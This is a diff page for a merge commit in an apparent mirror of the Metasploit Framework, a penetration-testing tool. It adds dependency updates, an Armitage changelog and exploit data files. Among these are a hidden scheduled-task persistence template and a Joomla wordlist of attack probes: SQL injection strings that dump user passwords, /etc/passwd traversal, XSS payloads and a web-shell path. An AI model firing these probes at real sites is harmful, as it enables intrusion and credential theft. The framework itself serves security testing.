infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of github.com:rapid7/metasploit-framework into rapid7

bug/bundler_fix
James Lee 2013-02-21 15:30:43 -06:00
parent d9e1653443 6ffe84ea98
commit c423ad2583
283 changed files with 12005 additions and 1278 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
.travis.yml
View File

@ -1,4 +1,8 @@
language: ruby
before_install:
- sudo apt-get update -qq
- sudo apt-get install -qq libpcap-dev
rvm:
#- '1.8.7'
- '1.9.3'
@ -6,3 +10,5 @@ rvm:
notifications:
irc: "irc.freenode.org#msfnotify"
git:
depth: 1

12
Gemfile
View File

@ -4,10 +4,20 @@ source 'http://rubygems.org'
gem 'activesupport', '>= 3.0.0'
# Needed for Msf::DbManager
gem 'activerecord'
# Needed for some admin modules (scrutinizer_add_user.rb)
gem 'json'
# Database models shared between framework and Pro.
gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.3.0'
gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.4.0'
# Needed by msfgui and other rpc components
gem 'msgpack'
# Needed by anemone crawler
gem 'nokogiri'
# Needed for module caching in Mdm::ModuleDetails
gem 'pg', '>= 0.11'
# Needed by anemone crawler
gem 'robots'
# For sniffer and raw socket modules
gem 'pcaprub'
group :development do
# Markdown formatting for yard

30
Gemfile.lock
View File

@ -1,10 +1,10 @@
GIT
remote: git://github.com/rapid7/metasploit_data_models.git
revision: 73f26789500f278dd6fd555e839d09a3b81a05f4
tag: 0.3.0
revision: 448c1065329efea1eac76a3897f626f122666743
tag: 0.4.0
specs:
metasploit_data_models (0.3.0)
activerecord
metasploit_data_models (0.4.0)
activerecord (>= 3.2.10)
activesupport
pg
pry
@ -12,15 +12,15 @@ GIT
GEM
remote: http://rubygems.org/
specs:
activemodel (3.2.9)
activesupport (= 3.2.9)
activemodel (3.2.11)
activesupport (= 3.2.11)
builder (~> 3.0.0)
activerecord (3.2.9)
activemodel (= 3.2.9)
activesupport (= 3.2.9)
activerecord (3.2.11)
activemodel (= 3.2.11)
activesupport (= 3.2.11)
arel (~> 3.0.2)
tzinfo (~> 0.3.29)
activesupport (3.2.9)
activesupport (3.2.11)
i18n (~> 0.6)
multi_json (~> 1.0)
arel (3.0.2)
@ -28,8 +28,12 @@ GEM
coderay (1.0.8)
diff-lcs (1.1.3)
i18n (0.6.1)
json (1.7.7)
method_source (0.8.1)
msgpack (0.5.2)
multi_json (1.0.4)
nokogiri (1.5.6)
pcaprub (0.11.3)
pg (0.14.1)
pry (0.9.10)
coderay (~> 1.0.5)
@ -37,6 +41,7 @@ GEM
slop (~> 3.3.1)
rake (10.0.2)
redcarpet (2.2.2)
robots (0.10.1)
rspec (2.12.0)
rspec-core (~> 2.12.0)
rspec-expectations (~> 2.12.0)
@ -59,10 +64,15 @@ PLATFORMS
DEPENDENCIES
activerecord
activesupport (>= 3.0.0)
json
metasploit_data_models!
msgpack
nokogiri
pcaprub
pg (>= 0.11)
rake
redcarpet
robots
rspec (>= 2.12)
simplecov (= 0.5.4)
yard

BIN
data/armitage/armitage.jar
View File

Binary file not shown.

BIN
data/armitage/cortana.jar
View File

Binary file not shown.

49
data/armitage/whatsnew.txt
View File

@ -1,6 +1,55 @@
Armitage Changelog
==================
12 Feb 13 (tested against msf 16438)
---------
- Fixed a corner case preventing the display of removed host labels
when connected to a team server.
- Fixed RPC call cache corruption in team server mode. This bug could
lead to some exploits defaulting to a shell payload when meterpreter
was a possibility.
- Slight optimization to some DB queries. I no longer pull unused
fields making the query marginally faster. Team server is more
efficient too as changes to unused fields won't force data (re)sync.
- Hosts -> Clear Database now clears host labels too.
- Added the ability to manage multiple team server instances through
Armitage. Go to Armitage -> New Connection to connect to another
server. A button bar will appear that allows you to switch active
Armitage connections.
- Credentials available across instances are pooled when using
the [host] -> Login menu and the credential helper.
- Rewrote the event log management code in the team server
- Added nickname tab completion to event log. I feel like I'm writing
an IRC client again.
- Hosts -> Clear Database now asks you to confirm the action.
- Hosts -> Import Hosts announces successful import to event log again.
23 Jan 13 (tested against msf 16351)
---------
- Added helpers to set EXE::Custom and EXE::Template options.
- Fixed a bug displaying a Windows 8 icon for Windows 2008 hosts
- Cleaned up Armitage -> SOCKS Proxy job management code. The code to
check if a proxy server is up was deadlock prone. Removed it.
- Starting SOCKS Proxy module now opens a tab displaying the module
start process. An event is posted to the event log too.
- Created an option helper to select credentials for SMBUser, SMBPass,
USERNAME, and PASSWORD.
- Added a feature to label hosts. A label will show up in its own column
in table view or below all info in graph view. Any team member may
change a label through [host] -> host -> Set Label. You may also use
dynamic workspaces to show hosts with certain labels attached.
- Fixed bad things happening when connecting Armitage to 'localhost' and
not '127.0.0.1'.
- Screenshots and Webcam shots are now centered in their tab.
- Added an alternate .bat file to start msfrpcd on Windows in the
Metasploit 4.5 installer's environment.
- Added a color-style for [!] warning messages
Cortana Updates (for scripters)
--------
- &handler function now works as advertised.
- Cortana now avoids use of core.setg
4 Jan 13 (tested against msf 16252)
--------
- Added a helper to set REXE option

BIN
data/exploits/cve-2012-5076_2/B.class Executable file
View File

Binary file not shown.

BIN
data/exploits/cve-2012-5076_2/Exploit.class Executable file
View File

Binary file not shown.

BIN
data/exploits/cve-2012-5088/B.class Executable file
View File

Binary file not shown.

BIN
data/exploits/cve-2012-5088/Exploit.class Executable file
View File

Binary file not shown.

2
data/exploits/docx/[Content_Types].xml Normal file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/></Types>

2
data/exploits/docx/_rels/.rels Normal file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>

2
data/exploits/docx/docProps/app.xml Normal file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>normal.dot</Template><TotalTime>0</TotalTime><Pages>1</Pages><Words>0</Words><Characters>3</Characters><Application>Microsoft Office Outlook</Application><DocSecurity>0</DocSecurity><Lines>0</Lines><Paragraphs>0</Paragraphs><ScaleCrop>false</ScaleCrop><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>0</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>12.0000</AppVersion></Properties>

2
data/exploits/docx/word/_rels/document.xml.rels Normal file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/></Relationships>

2
data/exploits/docx/word/document.xml Normal file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:document xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml"><w:body><w:p w:rsidR="00E97639" w:rsidRDefault="00E97639"><w:r><w:t> </w:t></w:r></w:p><w:sectPr w:rsidR="00E97639" w:rsidSect="00B25E88"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>

2
data/exploits/docx/word/fontTable.xml Normal file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:fonts xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="20002A87" w:usb1="80000000" w:usb2="00000008" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Cambria"><w:panose1 w:val="02040503050406030204"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000004B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/></w:font><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000207B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/></w:font></w:fonts>

2
data/exploits/docx/word/settings.xml Normal file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:settings xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main"><w:zoom w:percent="100"/><w:embedSystemFonts/><w:attachedTemplate r:id="rId1"/><w:defaultTabStop w:val="720"/><w:characterSpacingControl w:val="doNotCompress"/><w:doNotValidateAgainstSchema/><w:doNotDemarcateInvalidXml/><w:compat><w:useNormalStyleForList/><w:doNotUseIndentAsNumberingTabStop/><w:useAltKinsokuLineBreakRules/><w:allowSpaceOfSameStyleInTable/><w:doNotSuppressIndentation/><w:doNotAutofitConstrainedTables/><w:autofitToFirstFixedWidthCell/><w:underlineTabInNumList/><w:displayHangulFixedWidth/><w:splitPgBreakAndParaMark/><w:doNotVertAlignCellWithSp/><w:doNotBreakConstrainedForcedTable/><w:doNotVertAlignInTxbx/><w:useAnsiKerningPairs/><w:cachedColBalance/></w:compat><w:rsids><w:rsidRoot w:val="00B25E88"/><w:rsid w:val="00890656"/><w:rsid w:val="00B25E88"/><w:rsid w:val="00E97639"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="off"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:uiCompat97To2003/><w:themeFontLang w:val="en-US"/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/><w:doNotIncludeSubdocsInStats/><w:doNotAutoCompressPictures/><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/></w:settings>

2
data/exploits/docx/word/styles.xml Normal file
View File

File diff suppressed because one or more lines are too long

2
data/exploits/docx/word/theme/theme1.xml Normal file
View File

File diff suppressed because one or more lines are too long

2
data/exploits/docx/word/webSettings.xml Normal file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:optimizeForBrowser/></w:webSettings>

50
data/exploits/s4u_persistence.xml Normal file
View File

@ -0,0 +1,50 @@
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<Date>DATEHERE</Date>
<Author>USERHERE</Author>
</RegistrationInfo>
<Triggers>
<TimeTrigger>
<Repetition>
<Interval>PT60M</Interval>
<StopAtDurationEnd>false</StopAtDurationEnd>
</Repetition>
<StartBoundary>DATEHERE</StartBoundary>
<Enabled>true</Enabled>
</TimeTrigger>
</Triggers>
<Principals>
<Principal id="Author">
<UserId>DOMAINHERE</UserId>
<LogonType>S4U</LogonType>
<RunLevel>LeastPrivilege</RunLevel>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
<AllowHardTerminate>true</AllowHardTerminate>
<StartWhenAvailable>false</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<Duration>PT10M</Duration>
<WaitTimeout>PT1H</WaitTimeout>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>true</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
<Priority>7</Priority>
</Settings>
<Actions Context="Author">
<Exec>
<Command>COMMANDHERE</Command>
</Exec>
</Actions>
</Task>

BIN
data/gui/msfgui.jar
View File

Binary file not shown.

20
data/sql/migrate/20110608113500_add_cred_file_table.rb
View File

@ -1,20 +0,0 @@
class AddCredFileTable < ActiveRecord::Migration
def self.up
create_table :cred_files do |t|
t.integer :workspace_id, :null => false, :default => 1
t.string :path, :limit => 1024
t.string :ftype, :limit => 16
t.string :created_by
t.string :name, :limit => 512
t.string :desc, :limit => 1024
t.timestamps
end
end
def self.down
drop_table :cred_files
end
end

627
data/wordlists/joomla.txt Executable file
View File

@ -0,0 +1,627 @@
&controller=../../../../../../../../../../../../[LFI]%00
?1.5.10-x
?1.5.11-x-http_ref
?1.5.11-x-php-s3lf
?1.5.3-path-disclose
?1.5.3-spam
?1.5.8-x
?1.5.9-x
?j1012-fixate-session
?option=com_mysms&Itemid=0&task=phonebook
Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png
admin/
administrator/
administrator/components/
administrator/components/com_a6mambocredits/
administrator/components/com_a6mambohelpdesk/
administrator/components/com_admin/admin.admin.html.php
administrator/components/com_astatspro/refer.php
administrator/components/com_bayesiannaivefilter/
administrator/components/com_chronocontact/excelwriter/PPS/File.php
administrator/components/com_colophon/
administrator/components/com_colorlab/
administrator/components/com_comprofiler/
administrator/components/com_comprofiler/plugin.class.php
administrator/components/com_cropimage/admin.cropcanvas.php
administrator/components/com_extplorer/
administrator/components/com_feederator/includes/tmsp/add_tmsp.php
administrator/components/com_googlebase/
administrator/components/com_installer
administrator/components/com_jcs/
administrator/components/com_jim/
administrator/components/com_jjgallery/
administrator/components/com_joom12pic/
administrator/components/com_joomla-visites/
administrator/components/com_joomla_flash_uploader/
administrator/components/com_joomlaflashfun/
administrator/components/com_joomlaradiov5/
administrator/components/com_jpack/
administrator/components/com_jreactions/
administrator/components/com_juser/
administrator/components/com_admin/
administrator/components/com_kochsuite /
administrator/components/com_linkdirectory/
administrator/components/com_livechat/getSavedChatRooms.php
administrator/components/com_livechat/xmlhttp.php
administrator/components/com_lurm_constructor/admin.lurm_constructor.php
administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php");
administrator/components/com_mambelfish/
administrator/components/com_mgm/
administrator/components/com_mmp/help.mmp.php
administrator/components/com_mosmedia/
administrator/components/com_multibanners/extadminmenus.class.php
administrator/components/com_panoramic/
administrator/components/com_peoplebook/param.peoplebook.php
administrator/components/com_phpshop/toolbar.phpshop.html.php
administrator/components/com_remository/admin.remository.php
administrator/components/com_serverstat/install.serverstat.php
administrator/components/com_simpleswfupload/uploadhandler.php");
administrator/components/com_swmenupro/
administrator/components/com_treeg/
administrator/components/com_uhp/
administrator/components/com_uhp2/
administrator/components/com_webring/
administrator/components/com_wmtgallery/
administrator/components/com_wmtportfolio/
administrator/components/com_x-shop/
administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+
administrator/index.php?option=com_searchlog&act=log
ajaxim/
akocomments.php
cart?Itemid=[SQLi]
component/com__brightweblinks/
component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0
component/osproperty/?task=agent_register
component/quran/index.php?option=com_quran&action=viewayat&surano=
components/com_ clickheat/
components/com_5starhotels/
components/com_Jambook/jambook.php
components/com_a6mambocredits/
components/com_a6mambohelpdesk/
components/com_ab_gallery/
components/com_acajoom/
components/com_acctexp/
components/com_aclassf/
components/com_activities/
components/com_actualite/
components/com_admin/admin.admin.html.php
components/com_advancedpoll/
components/com_agora/
components/com_agoragroup/
components/com_ajaxchat/
components/com_akobook/
components/com_akocomment/
components/com_akogallery
components/com_alberghi/
components/com_allhotels/
components/com_alphacontent/
components/com_altas/
components/com_amocourse/
components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php
components/com_articles/
components/com_artist/
components/com_artlinks/
components/com_asortyment/
components/com_astatspro/
components/com_awesom/
components/com_babackup/
components/com_banners/
components/com_bayesiannaivefilter/
components/com_be_it_easypartner/
components/com_beamospetition/
components/com_biblestudy/
components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
components/com_blog/
components/com_bookflip/
components/com_bookjoomlas/
components/com_booklibrary/
components/com_books/
components/com_bsadv/
components/com_bsq_sitestats/
components/com_bsq_sitestats/external/rssfeed.php
components/com_bsqsitestats/
components/com_calendar/
components/com_camelcitydb2/
components/com_candle/
components/com_casino_blackjack/
components/com_casino_videopoker/
components/com_casinobase/
components/com_catalogproduction/
components/com_catalogshop/
components/com_category/
components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>
components/com_chronocontact/excelwriter/PPS/File.php
components/com_cinema/
components/com_clasifier/
components/com_classifieds/
components/com_clickheat/
components/com_cloner/
components/com_cmimarketplace/
components/com_cms/
components/com_colophon/
components/com_colorlab/
components/com_competitions/
components/com_comprofiler/
components/com_comprofiler/plugin.class.php
components/com_contactinfo/
components/com_content/
components/com_cpg/cpg.php
components/com_cropimage/admin.cropcanvas.php
components/com_custompages/
components/com_cx/
components/com_d3000/
components/com_dadamail/
components/com_dailymessage/
components/com_datsogallery/
components/com_dbquery/
components/com_detail/
components/com_digistore/
components/com_directory/
components/com_djiceshoutbox/
components/com_doc/
components/com_downloads/
components/com_ds-syndicate/
components/com_dtregister/
components/com_dv/externals/phpupload/upload.php");
components/com_easybook/
components/com_emcomposer/
components/com_equotes/
components/com_estateagent/
components/com_eventing/
components/com_eventlist/
components/com_events/
components/com_ewriting/
components/com_expose/uploadimg.php
components/com_expshop/
components/com_extcalendar/
components/com_extcalendar/cal_popup.php?extmode=view&extid=
components/com_extcalendar/extcalendar.php
components/com_extended_registration/registration_detailed.inc.php
components/com_extplorer/
components/com_ezine/
components/com_ezstore/
components/com_facileforms/
components/com_fantasytournament/
components/com_faq/
components/com_feederator/includes/tmsp/add_tmsp.php
components/com_filebase/
components/com_filiale/
components/com_flashfun/
components/com_flashmagazinedeluxe/
components/com_flippingbook/
components/com_flyspray/startdown.php
components/com_fm/fm.install.php
components/com_foevpartners/
components/com_football/
components/com_formtool/
components/com_forum/
components/com_fq/
components/com_fundraiser/
components/com_galeria/
components/com_galleria/galleria.html.php
components/com_gallery/
components/com_game/
components/com_gameq/
components/com_garyscookbook/
components/com_genealogy/
components/com_geoboerse/
components/com_gigcal/
components/com_gmaps/
components/com_googlebase/
components/com_gsticketsystem/
components/com_guide/
components/com_hashcash/server.php
components/com_hbssearch/
components/com_hello_world/
components/com_hotproperties/
components/com_hotproperty/
components/com_hotspots/
components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php
components/com_hwdvideoshare/
components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1");
components/com_ice/
components/com_idoblog/
components/com_idvnews/
components/com_ignitegallery/
components/com_ijoomla_archive/
components/com_ijoomla_rss/
components/com_inter/
components/com_ionfiles/
components/com_is/
components/com_ixxocart/
components/com_jabode/
components/com_jashowcase/
components/com_jb2/
components/com_jce/
components/com_jcs/
components/com_jd-wiki/
components/com_jd-wp/
components/com_jim/
components/com_jjgallery/
components/com_jmovies/
components/com_jobline/
components/com_jombib/
components/com_joobb/
components/com_jooget/
components/com_joom12pic/
components/com_joomla-visites/
components/com_joomla_flash_uploader/
components/com_joomlaboard/
components/com_joomladate/
components/com_joomlaflashfun/
components/com_joomlalib/
components/com_joomlaradiov5/
components/com_joomlavvz/
components/com_joomlaxplorer/
components/com_joomloads/
components/com_joomradio/
components/com_joomtracker/
components/com_joovideo/
components/com_jotloader/
components/com_journal/
components/com_jpack/
components/com_jpad/
components/com_jreactions/
components/com_jreviews/scripts/xajax.inc.php
components/com_jumi/
components/com_juser/
components/com_jvideo/
components/com_k2/
components/com_kbase/
components/com_knowledgebase/fckeditor/fckeditor.js
components/com_kochsuite /
components/com_kunena/
components/com_letterman/
components/com_lexikon/
components/com_linkdirectory/
components/com_listoffreeads/
components/com_livechat/getSavedChatRooms.php
components/com_livechat/xmlhttp.php
components/com_liveticker/
components/com_lm/
components/com_lmo/
components/com_loudmounth/includes/abbc/abbc.class.php
components/com_loudmouth/
components/com_lowcosthotels/
components/com_lurm_constructor/admin.lurm_constructor.php
components/com_mad4joomla/
components/com_madeira/img.php
components/com_maianmusic/
components/com_mailarchive/
components/com_mailto/
components/com_mambatstaff/mambatstaff.php
components/com_mambelfish/
components/com_mambospgm/
components/com_mambowiki/MamboLogin.php
components/com_marketplace/
components/com_mcquiz/
components/com_mdigg/
components/com_media_library/
components/com_mediaslide/
components/com_mezun/
components/com_mgm/
components/com_minibb/
components/com_misterestate/
components/com_mmp/help.mmp.php
components/com_model/
components/com_moodle/moodle.php
components/com_moofaq/
components/com_mosmedia/
components/com_mospray/scripts/admin.php
components/com_mosres/
components/com_most/
components/com_mp3_allopass/
components/com_mtree/
components/com_mtree/img/listings/o/{id}.php
components/com_multibanners/extadminmenus.class.php
components/com_myalbum/
components/com_mycontent/
components/com_mydyngallery/
components/com_mygallery/
components/com_n-forms/
components/com_na_content/
components/com_na_mydocs/
components/com_na_newsdescription/
components/com_na_qforms/
components/com_neogallery/
components/com_neorecruit/
components/com_neoreferences/
components/com_netinvoice/
components/com_news/
components/com_news_portal/
components/com_newsflash/
components/com_nfn_addressbook/
components/com_nicetalk/
components/com_noticias/
components/com_omnirealestate/
components/com_omphotogallery/
components/com_ongumatimesheet20/
components/com_onlineflashquiz/
components/com_ownbiblio/
components/com_panoramic/
components/com_paxgallery/
components/com_paxxgallery/
components/com_pcchess/
components/com_pcchess/include.pcchess.php
components/com_pccookbook/
components/com_pccookbook/pccookbook.php
components/com_peoplebook/param.peoplebook.php
components/com_performs/
components/com_philaform/
components/com_phocadocumentation/
components/com_php/
components/com_phpshop/toolbar.phpshop.html.php
components/com_pinboard/
components/com_pms/
components/com_poll/
components/com_pollxt/
components/com_ponygallery/
components/com_portafolio/
components/com_portfol/
components/com_prayercenter/
components/com_pro_desk/
components/com_prod/
components/com_productshowcase/
components/com_profiler/
components/com_projectfork/
components/com_propertylab/
components/com_puarcade/
components/com_publication/
components/com_quiz/
components/com_rapidrecipe/
components/com_rdautos/
components/com_realestatemanager/
components/com_recly/
components/com_referenzen/
components/com_rekry/
components/com_remository/admin.remository.php
components/com_remository_files/file_image_14/1276100016shell.php
components/com_reporter/processor/reporter.sql.php
components/com_resman/
components/com_restaurante/
components/com_ricette/
components/com_rsfiles/
components/com_rsgallery/
components/com_rsgallery2/
components/com_rss/
components/com_rssreader/
components/com_rssxt/
components/com_rwcards/
components/com_school/
components/com_search/
components/com_sebercart/getPic.php?p=[LFD]%00
components/com_securityimages/
components/com_sef/
components/com_seminar/
components/com_serverstat/install.serverstat.php
components/com_sg/
components/com_simple_review/
components/com_simpleboard/
components/com_simplefaq/
components/com_simpleshop/
components/com_sitemap/sitemap.xml.php
components/com_slideshow/
components/com_smf/
components/com_smf/smf.php
components/com_swmenupro/
components/com_team/
components/com_tech_article/
components/com_thopper/
components/com_thyme/
components/com_tickets/
components/com_tophotelmodule/
components/com_tour_toto/
components/com_trade/
components/com_uhp/
components/com_uhp2/
components/com_user/controller.php
components/com_users/
components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php
components/com_vehiclemanager/
components/com_versioning /
components/com_videodb/core/videodb.class.xml.php
components/com_virtuemart/
components/com_volunteer/
components/com_vr/
components/com_waticketsystem/
components/com_webhosting/
components/com_weblinks/
components/com_webring/
components/com_wmtgallery/
components/com_wmtportfolio/
components/com_x-shop/
components/com_xevidmegahd/
components/com_xewebtv/
components/com_xfaq/
components/com_xgallery/helpers/img.php?file=
components/com_xsstream-dm/
components/com_ynews/
components/com_yvcomment/
components/com_zoom/classes/
components/mod_letterman/
components/remository/
eXtplorer/
easyblog/entry/uncategorized
extplorer/
components/com_mtree/img/listings/o/{id}.php where {id}
includes/joomla.php
index.php/404'
index.php/?option=com_question&catID=21' and+1=0 union all
index.php/image-gallery/"><script>alert('xss')</script>/25-koala
index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&amp;type=css&v=1
index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view
index.php?option=com_aardvertiser&cat_name=conf&task=<=
index.php?option=com_aardvertiser&task=
index.php?option=com_abc&view=abc&letter=AS&sectionid='
index.php?option=com_advert&id=36'
index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users--
index.php?option=com_alfurqan15x&action=viewayat&surano=
index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version
index.php?option=com_annonces&view=edit&Itemid=1
index.php?option=com_articleman&task=new
index.php?option=com_bbs&bid=-1
index.php?option=com_beamospetition&startpage=3&pet=-
index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users-
index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27
index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1
index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users--
index.php?option=com_chronoconnectivity&itemid=1
index.php?option=com_chronocontact&itemid=1
index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=
index.php?option=com_clantools&squad=1+
index.php?option=com_clantools&task=clanwar&showgame=1+
index.php?option=com_commedia&format=raw&task=image&pid=4&id=964'
index.php?option=com_commedia&task=page&commpid=21
index.php?option=com_connect&view=connect&controller=
